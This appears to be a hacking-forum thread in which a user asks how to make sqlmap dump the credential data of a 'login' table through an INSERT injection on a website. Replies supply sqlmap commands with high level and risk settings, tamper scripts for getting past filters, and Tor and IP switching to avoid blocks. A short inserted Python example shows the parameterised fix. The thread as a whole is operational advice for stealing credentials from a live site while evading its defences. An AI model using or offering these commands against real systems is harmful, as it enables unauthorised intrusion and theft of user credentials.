SQL injection related question
Hey,

Let's say I have a website that has a SQL injection vulnerability inside an insert query, e.g.:
Insert into login(username, password) values ('[injection point]','')


Initially SQLmap found the database name and the table name. I got the column names through a manual
method but eventually I got it also working through SQLmap with the --technique=B parameter (blind) to get
the columns of the table "login".

The last step is to get the actual data using these values but SQLmap isn't helping me. I get the following
message: "unable to retrieve the number of entries for table 'login' in database [database]". Isn't that strange
as it is able to get the database/table/column names?

The thing is that I found a way to do this manually with a script, but I also want to learn SQLmap. So does
anyone have a way to exploit such a vulnerability with SQLmap?

One of the commands I ran is as follows:
sqlmap -r request.txt --random-agent --technique=B -p username --dump-all -D [database] -T login -C id,username

If it's not possible then I could make a tutorial on how this can be manually done, but I prefer SQLmap because
I have the feeling it should be possible.
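Added example (not from this thread or from sqlmap): the INSERT from the question in its vulnerable string-concatenation form next to the parameterized form that closes the injection point. It uses Python's sqlite3 module and an in-memory database so it runs offline; the site in the thread is presumably MySQL, but placeholders work the same way with any DB-API driver.

```python
import sqlite3


def make_db():
    # Fresh in-memory database with the "login" table named in the question.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    return conn


def insert_unsafe(conn, username, password):
    # Vulnerable form: user input is pasted straight into the SQL text, which is
    # the injection point the question describes. A single quote in the username
    # ends the string literal early and changes how the statement is parsed;
    # for an ordinary name like O'Brien that just surfaces as a syntax error.
    sql = "INSERT INTO login(username, password) VALUES ('%s','%s')" % (
        username,
        password,
    )
    try:
        conn.execute(sql)
        return "ok"
    except sqlite3.OperationalError:
        return "syntax error"


def insert_safe(conn, username, password):
    # Hardened form: the driver sends the values separately from the query text,
    # so quotes or SQL keywords in the input can never alter the statement.
    conn.execute(
        "INSERT INTO login(username, password) VALUES (?, ?)", (username, password)
    )
    return "ok"


def stored_usernames(conn):
    # Helper to inspect what actually landed in the table.
    return [row[0] for row in conn.execute("SELECT username FROM login ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    print(insert_unsafe(db, "O'Brien", "pw"))  # syntax error
    print(insert_safe(db, "O'Brien", "pw"))    # ok
    print(stored_usernames(db))                # ["O'Brien"]
```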

One error you have is using "--dump-all"; this will dump all of the content from the DB. You should instead use "--dump", which will only dump the selected data.

For your main issue:

Maybe the site has some poorly configured firewall which blocks SQLMAP injections but does not block manual injections?

You could try running it with the -v 6 setting (the default value is 1); this will print all the HTML responses for you to see, so you can check whether it experiences some errors / blocks.

(June 9, 2022, 05:02 PM)TheFlusha Wrote: One error you have is using "--dump-all"; this will dump all of the content from the DB. You should instead use "--dump", which will only dump the selected data.

For your main issue:

Maybe the site has some poorly configured firewall which blocks SQLMAP injections but does not block manual injections?

You could try running it with the -v 6 setting (the default value is 1); this will print all the HTML responses for you to see, so you can check whether it experiences some errors / blocks.


Ah yeah, good one, didn't notice that. Using --dump I get the following:
"unable to retrieve the number of column(s) 'id,username' entries for table 'login' in database [database]"
I will continue to test some stuff, thanks for the suggestion ^^

To me it looks like you are getting blocked. Try --delay, --time-sec, --timeout, also hex / no-cast, and random-agent. Also try the --tamper option; you've got a variety of tamper scripts to try. Consider switching IP, etc. There are many things you can try.

sqlmap -u "targeturl" --level=5 --risk=3 -o --dbs --answer="crack=n" --tor --check-tor --tor-type=socks5 --tor-port=9050 --no-cast --random-agent 

Or for dumping multiple columns you can do something like this: username,user,password --dump. If this doesn't work, try playing with tamper scripts: space2comment.py, space2hash.py and space2mysqlblank.py can be used if it's a MySQL database; charunicodeencode.py and percentage.py hide payloads against ASP/ASP.NET applications,
like this:
--dbms=mysql --tamper="space2comment.py,space2hash.py,space2mysqlblank.py,apostrophemask.py,apostrophenullencode.py,appendnullbyte.py,between.py" --tor --check-tor --tor-type=socks5 --tor-port=9050 --no-cast --random-agent
Use --dump-all. Maybe too late, but sorry; you can also send me a PM if you need help in the future with SQL injections or other webapp vulns.